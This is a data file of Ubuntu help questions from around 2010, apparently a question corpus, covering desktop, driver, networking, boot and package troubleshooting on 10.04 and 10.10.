13982	evolution can get the mail list from server , but the content ca n't be loaded	i 'm using evolution to connect exchange server . it can refresh the mail list from server , get the subject of new mail . however it ca n't show the content of those new mail in preview when i chose the subject . i have kill the backend services of evolution , then restart it . and it does n't report any error after restarting . maybe it 's caused by the disk is out of space where i store my mail . now the folder has enough quota , how to let evolution to redownload those mail from server ?
13983	gdm locale problems	i have two problems with gdm on ubuntu 10.04 . the first is with locales . in my system i have defined : $ cat /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' lang= '' es_es.utf-8 '' language= '' es_es : es : en_us : en '' $ cat /etc/default/locale lang= '' es_es.utf-8 '' language= '' es_es : es : en_us : en '' $ cat /var/lib/locales/supported.d/local es_es utf-8 es_es.utf-8 utf-8 en_us utf-8 en_us.utf-8 utf-8 but when i enter in gnome desktop : $ locale lang=es_es language=es_es : es : en_us : en lc_ctype= '' es_es '' lc_numeric= '' es_es '' lc_time= '' es_es '' lc_collate= '' es_es '' lc_monetary= '' es_es '' lc_messages= '' es_es '' lc_paper= '' es_es '' lc_name= '' es_es '' lc_address= '' es_es '' lc_telephone= '' es_es '' lc_measurement= '' es_es '' lc_identification= '' es_es '' lc_all= i have deleted ~/.dmrc and i have restarted the system but nothing . gdm login screen also does n't permit change this setting . however , in the text terminals ( tty1 , ... ) : $ locale lang=es_es.utf-8 language=es_es : es : en_us : en lc_ctype= '' es_es.utf-8 '' lc_numeric= '' es_es.utf-8 '' lc_time= '' es_es.utf-8 '' lc_collate= '' es_es.utf-8 '' lc_monetary= '' es_es.utf-8 '' lc_messages= '' es_es.utf-8 '' lc_paper= '' es_es.utf-8 '' lc_name= '' es_es.utf-8 '' lc_address= '' es_es.utf-8 '' lc_telephone= '' es_es.utf-8 '' lc_measurement= '' es_es.utf-8 '' lc_identification= '' es_es.utf-8 '' lc_all= the solution to problem is to edit .drmc file , but i think this is n't the right way . why does n't gdm read/apply the system locales ? why do n't i see , in gdm login screen , the box to change the locale ?
13984	where can i find the source of nautilus ?	where can i find the source of nautilus ? i 'd like to play around with its source code and compile it . what 's the best way to go about this ? obviously , it would be nice if i would easily be able to revert to the repository version if something bad happens : )
13986	exporting thunderbird rss feeds to liferea in ubuntu	i use thunderbird as my primary rss feed reader . lately thunderbird has been very slow to load and very sluggish . i want to try out liferea . is there any way to export my subscriptions to liferea ( opml or otherwise ) ?
13989	how to enable hp pavillon dv9000 pci express card	i have an hp pavillon dv9000 , i recently installed ubuntu 10.10 x64 on this laptop , everything works very very fine , but when i insert my esata pci express card in the slot , and attach my external esata hd nothing happen and it 's clear the hd is not recognized . i removed the card , tailed /var/log/syslog then i plugged in the card , but nothing was been added to the log . an idea ? thanks in advance
13993	how to connect to wired internet connection through terminal ?	i am using ubuntu 10.04 with kde on it . i am facing a problem in connecting to wired lan internet connection . can any one tell me the procedure on how to connect to wired lan internet connection through terminal.. i want to connect to wired internet connection with static ip and authentication .
13994	msi vr601 laptop wo n't resume after suspend	i know that you 're probably sick with this issue , but i promise you all that i searched for a solution for this annoying issue , but could n't find a thing . when i suspend my laptop , normally the power button keeps blinking , and then it should resume , in my case it wo n't , it seems as it 's about to resume , then the laptop shuts down , then suddenly powers up , but with nothing . the screen stays black , and the hdd indicator wo n't blink . i 've a msi vr601 laptop : - intel pentium dual cpu t2370 ( 1.73 ghz ) - 2 gigabytes of ram - 160 gigabytes hdd - intel integrated graphics ( gm965 ) i 'm running ubuntu 10.10 ( gnome , kernel 2.6.35-22 ) , suspending never worked for me to be honest , on any ubuntu edition , it just never worked . i once tried opensuse ( kde ) and it worked flawlessly , but i 'm an ubuntu fan i ca n't swtich to anything else in the mean time . i tried to install the s2ram thing , but when i try to run it , it says unsupported hardware . i beg you to help me through this , i 'm sick & tired of this issue . thanking you in advance .
13996	where should i place source code that i wish to compile ?	here 's the scenario ; i 've downloaded a tarball . i 've extracted all the source contained inside to my home folder `` /home/zolomon/sourcecode '' . but where should i place the sourcecode directory with its content when i wish to compile it ? does it matter ? will it , in most cases , install and place files in the correct place automatically when i install it ? in this case i 'm talking about rubygems .
14008	i have a hardware detection problem , what logs do i need to look into ?	i am trying to ask a question about getting my hardware to work but i do n't know what information to add to my question to get help , what do i need to do ? related if you do n't have access to a gui : how do i get information from the logs on my computer when i only have access to the command line ?
14010	how to open more file in same window on different tag ( using quanta plus editor )	hello everybody i 'm facing a problem with quanta plus when i open more than one file in quanta plus every file opens in new window of quanta plus instead of in a new tab . please reply urgent shalu
14017	how to file a bug about ubiquity ?	what is the best channel for making suggestions as to changes to ubuntu ( or more specifically ubiquity ) ? i have spotted an issue that is not really a bug , but its a fairly big usability hurdle . i was helping somebody install ubuntu on a vm , and they kept getting stuck at the 'who are you ' section , eventually i spotted that they had an uppercase letter in their username . the problem is that the installer did not let them know this was the issue , and it was very frustrating for the user .
14021	terminal headline bold and with color like linux mint	in the past i 've been using linux mint , but i 'm back on ubuntu , and i like to know how to put the terminal headline ( the user @ computername : ~ $ ) in bold and with color like linux mint . this is particulary usefull to me becouse i use a terminal in the widget layer of compiz . thanks for the help
14028	how to run docky in 3d mode ?	i want to use docky but , he uses 2d mode : ( how to run in 3d ? upd : i have got this black field ... bottom left . this is emulated 3d ?
14030	what is a good amd phenom compatible motherboard to use ?	i 'm buying a new computer and i think i will be going for a system based on a phenom x6 cpu . i will be getting an nvidia gpu for support under linux , and 8gb of memory . i expect to use 64-bit ubuntu on this rig , but in the past it 's proven tricky to find whether or not all the on-board goodies work on linux . can you suggest a motherboard that you know works fine ? i 'd like the following : suspend definitely has to work - i 've been stuck with non working suspend for way too long ( on an intel d865perl ) . i expect to use integrated sound , and would very much like support for front panel audio ( in particular , i want rear-connected speakers to go mute when plugging in headphones in the front panel , we 're in 2010 after all ) . an esata port . ethernet would be nice . i could plug in a pci ethernet card , so this is not a must . sata 3 & usb 3 for future upgrades ( `` support will be in kernel in 3 months '' is ok , i 'm not planning to use either right away ) . i am considering this one : gigabyte ga-870a-ud3 what do you think ? sound is alc892 , ethernet is realtek 8111d . any other options ? i can use matx as well as atx , but if i have to use a pci ethernet card then i would prefer atx to keep some ports available . thanks !
14038	what would be the most practical way for a web developer to develop on ubuntu but test on ie	i work as web developer and have firefox and chrome installed on my ubuntu system . however , most of the nightmares for web developers are getting things to work on internet explorer , mostly ie7 and ie8 . my entire team of developers have switched to ubuntu and now we 're facing a difficult time with testing on ie . i 'd like to be able to test from my own desktop , but not install virtualbox on each system , since that would defeat the purpose of moving to ubuntu . is it possible to have windows run on a virtual box instance on one server and remotely connect to it from say 5 or 6 systems at the same time ? or even run windows on one box and have my entire team remotely access that desktop ?
14042	how to restrict / limit the number of rdp sessions ?	i need a way to restrict the remote desktop sessions on ubuntu server . any ideas how i can do that ? i did google , but did n't find anything for ubuntu . thanks !
14044	accesing windows 7 shares - numerous issues	the long and short of my problem is that i am unable to access the shared folder of a windows 7 machine on the same network . i click on the network icon in places , then i can see the windows network option , but when i click on this , i get the message failed to retrieve share list from server . ok , ive tried to install samba ( sudo apt-get install samba ) and ive also installed sbmfs . ive set the workgroup in /etc/samba/smb.conf to workgroup - the same as the other windows computers on the network . as far as im aware i should now be able to get access to the shared folders on the windows 7 computers , but no luck , i cant even get past the 'windows network ' icon . when i check the list of processes in system monitor theres no sign of anything called samba or smb . when i go to start samba via /etc/init.d/samba start . i get the message command not found . as regards the network architecture , its a simple home network running through a router , i dont know if itll make a difference but the router is a dlink dir-615 . windows machines can share files without any problems .
14047	manage a system of ubuntu computers from a single computer	i 'm a student at a small high school in denmark , im the only one using ubuntu , but i 'd like the other students to at least try it . so i asked for permission to set up a small group of computers for the others to try , mostly for smaller school tasks , or random internet surfing . so far they 've let me set up 4 computers , and i would like to manage all the computers from a single computer which should also work as the `` picture '' for the other computers . i need software to manage this , as mentioned below is vnc as an opportunity , but what i get from reading about it is that this kind of soft ware is just sharing a screen ( which is hopefully wrong ) and what equipment would i like to use ?
14048	how to disable single mouse click folder opening ?	i am using lucid 10.04 with kde . when i single click on any folder in my file browser it is behaving as a folder . i am not able to select a folder ( it always opens the folder ) . right now to select i am using keyboard . how to avoid this situation ? i saw there are some posts on this and they talk about nvidia in all those . i do n't have an nvidia graphics card . any solution for this ?
14050	mass printing odt documents	is there a faster way to print multiple odt documents besides opening each one in openoffice/libreoffice and printing each document separately ? it would be great if i could just select multiple documents in nautilus and have some option to print them all with the same print settings .
14059	what distribution am i using ?	this question may find silly but here is the question.. my friend sent me a laptop from u.s. and he said he installed kde on ubuntu.. how do i confirm that if it is kde over ubuntu or kubuntu ? i am looking for some command that i can execute in terminal to find the info
14064	no audio from vlc and mozilla + flash	i am using ubuntu 10.04 with vlc 1.1.5.. mine is 64 bit version.. when i play any content ( audio/video ) in vlc i dont hear any audio coming ? same thing happening with flash content playing in mozilla.. i tried to install vlc-plugin-esd but i am getting the error as package not found.. any solution for this ?
14066	is there a virtual printer to output an open office doc to multiple images ( jpg , png etc ) ?	i 'm after a virtual printer which takes each page of `` printed '' output and converts into multiple images ( one image for each page ) ... eg . .jpg , or .png , etc.. i 'm specifically looking for something to work with open-office writer , but i assume that such a virtual printer would work across the board for any app which can send its output to a `` printer '' . is there such a thing in the ubuntu repository ? ps . i want one `` normal '' picture image per page.. ie many images are output . ... ( like the snagit virtual printer in windows )
14071	my card reader does n't show up at all , but previously did in 10.10	i bought a pin-based-usb powered internal media card reader and it worked perfectly when i first installed ubuntu 10.10 a month ago . i used it a few times since and today i booted up the computer and it 's not working . here 's how it used to work : in nautilus- > computer , 5 `` drives '' would display even when no card was inserted . one for each slot ( sd , xd , cf/ms , etc ) . opening one w/o a card would initiate a `` please insert card . '' dialog . inserting a card would automatically open nautilus . now : no drives display at all whether cards are inserted or not . lsusb lists the following ( which seems to indicate that it 's not being detected ) bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 046d : c52e logitech , inc. ( my keyboard/mouse ) bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 002 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ( a side note , all of my usb ports are 2.0 + 1 usb port which is 3.0 , why does everything say 1.1/2.0 ? ) i tried using ubuntu-bug but for usb devices it expects you to be able to remove and insert them while the computer is running -- obviously something you probably should n't be doing when you 're dealing with devices plugged straight into the usb pins . thanks in advance !
14077	how can i change the default audio device from command line ?	ubuntu 's desktop gui is great for changing audio settings ( system- > preferences- > sound ) , like the default input/output device and setting the volume . however , i would like to be able to do these things from the command-line . what tool is the gui using behind the scenes ?
14078	can i install a firewall interface without `menu` ?	i need an interface for ufw ( uncomplicated firewall ) that does not depend on `` menu '' , which is outdated and messing with software updates/installations . i do n't mind building from source but prefer a deb .
14081	what is the maximum length of command line arguments in gnome-terminal ?	what is the maximum length of command line arguments in gnome-terminal ? ... and is there a system environment variable which reports this value ?
14086	does compiling programs from source speed up my operating system ?	somewhere i read that i should remove default programs in ubuntu and then compile and install them again for speeding up my os . is this true ?
14089	how to remove menu items ?	i want to remove these items from the system menu : help and support about gnome about ubuntu i ca n't do this with main menu ( bad naming , should be menumanager or so ) .
14098	how can i solve a pidgin certificate error ?	changing my ~/.purple/certificates to certificates.old does n't solved . unable to validate certificate the certificate for omega.contacts.msn.com could not be validated . the certificate chain presented is invalid . any idea how to make pidgin work ?
14110	how do i install openvpn keys ?	how do i get the keys & certificate to work on openvpn client ? i have been given those by the vpn provider . but openvpn needs more than user key & cert ?
14114	troubleshoot sun-java6-jdk installation	just finished a clean install of ubuntu 10.10 on a new machine i added the partner repository via ubuntu software center i ran 'sudo apt-get install sun-java6-jdk' i ran 'sudo update-java-alternatives -s java-6-sun ' and got this error : alex @ alex-home : ~ $ sudo update-java-alternatives -s java-6-sun update-alternatives : error : no alternatives for mozilla-javaplugin.so . update-alternatives : error : no alternatives for xulrunner-1.9-javaplugin.so . update-alternatives : error : no alternatives for mozilla-javaplugin.so . update-alternatives : error : no alternatives for xulrunner-1.9-javaplugin.so . double checking it failed , i am still on the jre : alex @ alex-home : ~ $ java -version java version `` 1.6.0_22 '' java ( tm ) se runtime environment ( build 1.6.0_22-b04 ) java hotspot ( tm ) 64-bit server vm ( build 17.1-b03 , mixed mode ) alex @ alex-home : ~ $ tried this too : alex @ alex-home : ~ $ sudo update-alternatives -- config java there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-6-openjdk/jre/bin/java 1061 auto mode 1 /usr/lib/jvm/java-6-openjdk/jre/bin/java 1061 manual mode * 2 /usr/lib/jvm/java-6-sun/jre/bin/java 63 manual mode press enter to keep the current choice [ * ] , or type selection number : the jdk is not listed , but it is listed on disk : alex @ alex-home : ~ $ ls /usr/lib/jvm/ default-java java-1.6.0-openjdk java-6-openjdk java-6-sun java-6-sun-1.6.0.22 update : installing plugin and fonts caused update-java-alternatives to stop complaining , but still no luck : sudo apt-get install sun-java6-plugin sun-java6-fonts then : alex @ alex-home : ~ $ sudo update-java-alternatives -s java-6-sun alex @ alex-home : ~ $ java -version java version `` 1.6.0_22 '' java ( tm ) se runtime environment ( build 1.6.0_22-b04 ) java hotspot ( tm ) 64-bit server vm ( build 17.1-b03 , mixed mode ) update 2 : hmm , maybe its actually working ? i thought `` ... se runtime ... '' meant jre , but maybe its all good ?
14115	~/.xsession-errors is 2.7gb big ( and growing ) , on fresh install , caused by gnome-settings-daemon errors	i 've just installed ubuntu 10.10 x64 , activated the recommended nvidia drivers , and i noticed my hard disk space is disappearing , i narrowed the culprit down to this : alex @ alex-home : ~ $ ls -la .x* -rw -- -- -- - 1 alex alex 4436076400 2010-11-19 22:35 .xsession-errors -rw -- -- -- - 1 alex alex 10495 2010-11-19 21:46 .xsession-errors.old any idea what this file is , why its so big , and why its growing ? a few seconds later : alex @ alex-home : ~ $ ls -la .x* -rw -- -- -- - 1 alex alex 5143604317 2010-11-19 22:36 .xsession-errors -rw -- -- -- - 1 alex alex 10495 2010-11-19 21:46 .xsession-errors.old tailing it : alex @ alex-home : ~ $ tail .xsession-errors ( gnome-settings-daemon:1514 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ( gnome-settings-daemon:1514 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ( gnome-settings-daemon:1514 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ( gnome-settings-daemon:1514 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ( gnome-settings-daemon:1514 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed also , the process `` gnome-settings '' seems to be using 100 % cpu : pid user pr ni virt res shr s % cpu % mem time+ command 1514 alex 20 0 268m 10m 7044 r 100 0.1 7:06.10 gnome-settings-
14133	why is it so easy to install graphic card drivers and such a pain to install printer drivers ?	it 's easy to install nvidia or ati drivers for graphic cards , just wait that ubuntu detect it and propose you to install a proprietary driver . i 've just change my old nvidia card with a new ati with no problem . but when you want to add a new printer ... ( brother in my case ) there is no easy way , why ?
14135	how to migrate tomboy notes from a previous installation ?	i used tomboy on a previous installation , however the ubuntu one sync had stopped working ( i had upgraded through several versions of tomboy , and during that time i believe the storage system changed ... possibly the reason ) . now i would like to migrate the notes to my ubuntu 10.10 installation .
14140	minimize boot time	i 'm using ubuntu 10.04 ( pinguy os ) . my system takes more than 30 seconds to boot ( atom 1.6ghz ) . how to choose which modules to load during booting ?
14142	how to change the font in the terminal of server ?	i 'm running a 10.04 server at home . is it possible to install the new ubuntu font used in the 10.10 desktop versions on my server and configure it so the console uses it when i hook up a monitor to it while i 'm working on it ( for when ssh is n't working ) ? thanks for your help ! !
14147	hangs up while booting after editing grub.cfg	my lucid install wo n't boot properly anymore . i can boot the computer with a usb-stick-ubuntu and edit settings . i have edited grub.cfg to not boot `` quiet splash '' and changed the default runlevel to 1 . when continuing to boot from the recovery menu , i get this line : init : rsyslog main process ended , respawning . i did a aptitude reinstall rsyslog , which changed nothing . does someone have an idea where to continue searching for the cause ? thanks in advance ,
14152	how to set up router with dsl ?	i have a verizon dsl connection . i am new to being the one who has to maintain the net . we have the verizon modem and plugged into it is a belkin router . i did not alter the configuration on either of the devices . we get a net connection , though i have issues joining any form of online game . some refuse to connect , others are slow . i have read that perhaps i need to use the modem in `` bridge mode '' to the wireless router ? would that fix my issues ? or do i just have to open ports or something similar . i really have no clue what could be the problem . could someone advice me how to get this working with ubuntu ?
14153	why does tasksel exist when there are already meta packages ?	i 've recently heard of tasksel , a tool that `` installs multiple related packages as a co-ordinated `` task '' onto your system '' . what is the difference between using tasksel and installing meta packages via apt-get ? what does it do that meta packages ca n't accomplish ?
14155	what to do when ctrl-c wo n't kill running job ?	sometimes , processes ignore the sigint signal sent by ctrl-c in bash . for instance , man and vi . assuming you do n't want to google or read the manual on how to exit the running process , is there any key sequence that will always work ( without leaving the terminal ) ?
14160	lower speeds while copying data to a thumb drive	i have experienced this issue with almost all versions of ubuntu . it happens with all types of thumb drives . i have faced same issues with all the pc 's i have used . at the beginning it seems like data is getting copied with a reasonable speed but after few seconds it slows down , and progress bar even stops intermittently . in comparison to speeds on windows , it is terribly slow .
14162	how do i duplicate a server 's packages and configuration to another machine ?	i have a production server running ubuntu . i would like to setup similar configuration installed on my local machine . i 'd like to have same packages installed . since bandwidth is a constraint the traditional disk cloning methods wo n't work for me . having same packages installed and same users with same passwords created would be wonderful ; i 'll tweak rest of the things manually . is there a good solution to my requirements ?
14165	how do i convert a fat32 to ext3 ( keeping the data on it )	is there a way to convert a fat partition to ext3 ( or other ext.. ) while keeping the data on it ? i do n't have access to a external usb hard disk to temporarily store the data , so i 'd like to just convert it while the data sits on the partition . is that possible ?
14168	installer gets stuck with a grayed out forward button	i have a cd with ubuntu 10.10 and a laptop with ubuntu 8.10 . the laptop had all sorts of crud on it , and anything i wanted to keep was backed up on an external drive , so i was happy to do a wipe and reinstall instead of an update . so after a bit of faffing about trying to work out how to get the thing to boot from the cd drive , i did that . so the screen comes up with the choice : the options are try ubuntu and install ubuntu . i choose to install and to overwrite my current installation . so far so good . i then get a progress bar labelled something like copying files ( i forget the exact wording ) and further options to fill in for my location , keyboard locale , username and password . on each of these screens there are forward and back buttons . on the last screen ( password ) , the forward button is greyed out . well , i think to myself , no doubt it will become active when that copying files progress bar completes . the progress bar never completes . it hangs . and the label changes from copying files to the chirpy ready when you are . the forward button remains greyed out . the back button is as unhelpful as you 'd expect it to be . and there 's nothing else to click . we have reached an impasse . i tried restarting the laptop , to test whether it actually was properly installed . it was n't . i tried to run ubuntu live from the cd , to test whether the disk was damaged . that would n't work either , but i suspect it 's just because the laptop is old and has a slow disk drive . i 'm typing this question on another computer using the ubuntu live cd and it 's working fine . so there 's nothing wrong with the cd .
14172	moving up network manager start time	a previous question having yielded no conclusive results , so i would like to know if is possible to move up the time when the network manager starts to be earlier in the boot process , since it takes so much time to load once i am connected . it should be ready by the time i reach the login screen , without the stupid 15 second delay i keep experiencing every time i log in ! for more information on my problem , see this question
14173	switching from ubuntu to kubuntu . what applications to use ?	i am a longtime user of ubuntu . however , i am disillusioned by the way the ubuntu is going and would like to move to kde . can you suggest some good kde applications for basic tasks like chatting , e-mail , browsing , irc , ftp , etc. ? i do n't want to use gtk apps . i am quite new to kde .
14178	how to disable touchpad on dell latitude e-series ( e5510 , e6510 ) ?	i want to disable the touchpad . i want to keep the trackstick . is it possible ? the alps touchpad is recognized by the kernel as a ps/2 generic mouse . not all its features are supported by the kernel yet . only a single /dev/input/event12 device is provided for both the touchpad and the trackstick . yet it seems that windows allows to disable the touchpad .
14180	how can i install a keylogger software ?	is there any free keylogger software for ubuntu . if yes , how can i install it ?
14183	what task and time management tools are available ?	is there a package to install in a server for task/time management ? i want to create activities and add milestones to those activities , maybe it can have graphics reports too . i 'd like to install it in a server and to use it from other pcs , not local . ( a web interfase ) . maybe something like klock
14191	ubuntu sound not working	i am using ubuntu 10.10 and my sound stopped working . it had happened before and i had a vague recollection that reinstalling something worked so i did : sudo apt-get purge pulseaudio sudo apt-get install pulseaudio sudo apt-get purge alsa sudo apt-get install alsa but now even the volume control icon is gone . i also tried this later : sudo apt-get -- purge remove linux-sound-base alsa-base alsa-utils sudo apt-get install linux-sound-base alsa-base alsa-utils , but still the sound is not coming .
14193	how to change handler of apt : urls ?	in firefox on a fresh install of 10.10 when visiting apt.ubuntu.com/p/banshee ( for example ) i get prompted with the following window : however , i was under the impression that apturl was supposed to launch software center . how can i configure what application apturl is launched with - and is the above screenshot expected actions for 10.10 ?
14195	get uuid of specific connection ?	is it possible to get the uuid of a specific connection ? i have used the connection before and it is set to auto when networkmanager detects it so it is not listed in /etc/networkmanager/system-connections
14196	samsung nc10 broadcom difficulties	i am new to ubuntu/linux and am stuck already ! any help much appreciated . i have managed to install ubuntu maverick 10.10 ( from a usb flash drive ) on my nc10 which also has windows 7 on the partitioned drive . but the wireless internet is not working . i have identified the hardware as a broadcom bcm4313 . i have also managed to find that the correct driver is installed ( modaliases for broadcom 802.11 linux sta driver ) . i have followed advice from elsewhere and there does not seem to be any competition from other drivers . i am now stuck and do not have any other internet access on this netbook . any ideas ?
14197	how do i force gnome commander to use vlc instead of movie player by default ?	when i double click on a video file in gnome commander , for some reason it opens in movie player ( totem ? ) instead of vlc , which is set as preferred for all file types . clicking on the same file from nautilus opens the file in vlc . is there a way to force gnome commander to use `` standard '' gnome mime-type associations ? update : following iamsid 's answer below , this is what i did : edit the file ~/.local/share/applications/defaults.list ( if the file does not exist , create it ) , and add the following : [ default applications ] video/x-msvideo=vlc.desktop video/x-flv=vlc.desktop video/mp2t=vlc.desktop video/mp4=vlc.desktop video/mpeg=vlc.desktop video/ogg=vlc.desktop video/x-theora+ogg=vlc.desktop video/x-ms-wmv=vlc.desktop you can of course add other mime types as needed . to see a file 's mime type , you can right-click on a file in gnome commander , go to properties and then the metadata tab . expand the `` file '' item and you will see the mime type under `` format '' tag . vlc.desktop already exists in /local/share/applications , so you can use that , i used a custom .desktop file in my ~/local/share/applications folder , but found out it 's not necessary .
14200	how to set global hotkeys for rhythmbox ?	i would like to bind f1 to play/pause and f2 to next song globally how to do it ?
14202	how to use an input language different from the keyboard layout country and from the system language ?	my system language is set to english and i want it to stay that way my keyboard layout is set to usa intl and i want it to stay that way i ca n't write ç , by pressing ´+c . when i try to do so it outputs ć in windows the keyboard layout country can be different from both system and input languages , which in their turn can be different from each other . i want to achieve the same with ubuntu
14203	how can i connect usb to tv ( via av port )	how to connect to tv with usb to av cable ? i tried to connect , but nothing happened ! ( 10.04 lucid )
14208	why does an encrypted folder totally fill my /home/ folder ?	when i installed ubuntu 10.10 on my laptop from the cd , i choose for encrypting my home folder . just after , i copied a lot of files to ~ , but that copying might not have worked . since then my computer is running very slow . i restarted my computer enough times to have the system file checks be done during some boots : no change . as a consequence i analyzed my /home/ folder using baobab . it indicates my home is full up to 75 % . nearly the half of it is occupied by /home/.ecryptfs/ , the other half by /home/grandoxymore/ . they both share precisely the same tree structure . is this normal ? if no , how should i fix this ? if yes , how can i improve my computer performances ? and , how can i unencrypt my home folder ?
14210	application windows do not fit on the screen	most of the windows does not fit on my hp-mini-210 ( 1024*600 ) the apply and close buttons are not fit on scrren and conky too ! !
14218	why is my keyboard gets suddenly locked ?	i start normally my notebook lenovo 3000 n200 my version is 10.04 . after many hours working on computer with mouse my keyboard gets locked . so i ca n't type anything , only ctrl + alt + f1 is working . when i reboot i can use my keyboard . sometimes is mouse locked too . how can i lokalize this problem ?
14219	how to create deb installer from tarballs ?	there are several tarballs ( e.g . firefox , eclipse , zend studio and ... ) that have executable file within , that easily we can extract them and run . but this will available only for user that extract it . if we want to make it available for all user we should move it somewhere like /usr/share , /usr/local/share/ , /opt/ & ... , and give permission , make executable file on /usr/bin/ and so on ... i want to make a deb installer file that do them all ! so how to do it ? is it possible ? ps : sorry for my bad english , and if i was wrong please tell me to correct my knowledge thanks in advance !
14222	how to add a guest account without a password ?	sometimes i have friends in my house that want use my computer . how can they use a guest account without typing a password ?
14226	old machine ( p ii ) , grub2 never works ... ( fifth time ) . how to set the right config ?	i gained an old machine , what 's config is : pentium 2 , 300 mhz 147 mb sdram ( recently extended ) 3 gb ide hdd - primary master 10 gb ide hdd - primary slave ( recently added ) 52x cd-rom - secondary master floppy drive 2x usb 2x ps/2 2x eth card ( recently added 1 of them ) 2x video card ( i wanted to try multi-seat : d : d : d ) ( recently added 1 of them ) before my tries , there were win98 , what perfectly ( lol ) worked with this config . with ubuntu 10.04 alternate cd , i did n't think , that it can be installed with graphical interface . i thought about lvm .. but no , i thought this is too slow processor . to the primary master ( hda , 3gb ) i put /boot with ext4 , after grub error : unknown filesystem ext3 ; and swap for the other free space . to the primary slave ( hdb , 10gb ) , i put / with ext4 . i 've installed grub2 to mbr . it always showed me some error , and grub rescue > prompt . finally i 've learnt use that , and i tried to set prefix ... , ls , insmod ( hd0,1 ) /boot/grub/ ... . that last command always shows me error : unknown filesystem . how may i partition this ? the installion gets no errors , the /boot is filled with data files ( linux images , etc. ) . is there any other suggestion to get on with old systems ? thanks !
14228	how do i install a nice notification indicator for the keyboard layout ?	i am used to changing often my keyboard layout . therefore i can easily use the indicator in the notification area . however it does not look very nice , because of its colors . is there a mean to replace it by a 'mono-colored ' indicator , for the ambiance and for the radiance themes ?
14234	ca n't connect to wireless network	i am using wifi radar to connect to wireless networks , but it never connects me . i can see all the available networks , when i pick one and try to connect , the connection screen never goes away and it never connects .
14236	bluetooth issues with microsoft 6000 keyboard	ubuntu 10.10 64 bit i ca n't get the keyboard to connect at all . i 've tried both the default bluetooth install via the graphical interface and installed bluez-gnome as well . sudo hidd -- connect sudo hidd -- search hcitool scan does n't work either . when doing search the keyboard is found , but wo n't connect . the keyboard connects fine in windows and osx using the same bluetooth usb dongle . update 1 : i am going to try : http : //www.siamnet.org/wiki/ubuntu-applebluetoothkeyboard will update here if any updates . if anyone has a suggestion i welcome it .
14238	add unallocated space to extended partitions	in a pc where i need to install ubuntu , i have the following disk partitions from the left side of partition table as of now : ntfs - primary windows vista extended - 3 nos . all ntfs - middle one contains data unallocated space ntfs - primary ntfs - primary hp recovery my intention is to add unallocated space to the extended partition . will i be able to use gparted to do it ? also , can i install ubuntu in one of the extended partitions and make this unallocated partition the home partition for ubuntu . i am not able to add new partition in this unallocated space as disk manager in vista throws up an error no free disk space to complete the operation . i read in some forum that oem installations allow only 3 primary partitions and one extended or 4 primary ones . is it true for oem 's only or its a universal rule ?
14242	additional driver install fails , says check `` /var/log/jockey.log ''	i just installed linux mint 10 on my laptop and i 'm trying to install my wireless drivers from the additional driver installation page . i was able to install them when i was `` trying '' linux mint , but now that i have fully installed it i can not install the wireless drivers without getting an error . it tells me to check the /var/log/jockey.log for details ... .
14243	files downloaded from my ubuntu server appear to be treated as text , regardless of their type - how to fix ?	i am running ubuntu server 10.04.1 on an x86 box , and all seems ok , however , i have also installed apache2 and proftpd , and configured them as per documentation . i am having problems when i download non-text files ( binaries , images , etc ) they appear to be treated as text , resulting in an unusable file received by the client machine . i have tried both vsftpd and currently proftpd on the server with the same result . when downloading files using http ( from the apache server ) the same thing occurs . i tried removing ufw ( the firewall ) and rebooting , but it made no difference . it seems that the problem lies within ubuntu itself , and it is a serious problem , as it makes this machine useless as a web server . is there a fix and what is it please ?
14249	what is the `` whois '' requests limit ?	i need to do a few thousands whois requests , i am pretty sure i will reach a limit at one point but i ca n't find exactly where that limit is , `` man whois '' shows me `` no manual entry for whois '' . does someone knows how many whois requests i can do before reaching the limit ?
14252	how , in a script , can i determine if a file is currently being written to by another process ?	i 'm very new to bash scripting , so i might be barking up the wrong tree , but here is my current situation : in a script , i start soffice ; to convert an odt to a pdf it seems that soffice detaches itself from the script 's process , and wanders off to do its own thing.. okay , that 's fine ; gui apps tend to do that ... however i need to wait until the new pdf has been fully written , as my next step involves processing that new pdf . ( as far as i know ) i ca n't utilize soffice 's process-id , because it may have already been a running process before my script started : eg . soffice may be already open for normal gui activity for another unrelated document/presentation/spreadsheet . the crux of the matter for me is that before i can proceed , the writing of the new pdf must be finalized ... is there some way to determine when a file is no longer open to another process in `` write '' mode ? ...
14257	a simple timer app , similar to timer-applet	i 'm looking for a simple countdown timer application , something similar to timer-applet , which appears to be deprecated . ( it 's in the repositories but when i tried to install it there were dependency issues with gnome-audio and it hosed my system . ) my ideal app would have the following features : is lightweight and fast ( starts up fast and does n't use a lot of system resources ) has functionality for user-defined presets for commonly used times ( like for using the 10+2 work method ) plays a sound and displays a notification when the time set is reached . is a native gnome app & not a webapp is an indicator applet note : i am looking for a countdown timer app , not a timetracking app . thank you .
14259	how to get pianobar working with tor and polipo	wanting to listen to pandora from outside the us , i followed the instructions here and changed my /etc/tor/torrc file according to the instructions here . i learned about pianobar , a console-based pandora player , and decided to give it a try . however , i kept getting the same error : ( i ) login ... network error : connection refused . in ~/.config/pianobar/config i tried each of the following lines , to no avail : proxy = http : //localhost:8118/ control_proxy = http : //localhost:8118/ control_proxy = http : //localhost:9050/ same error every time .
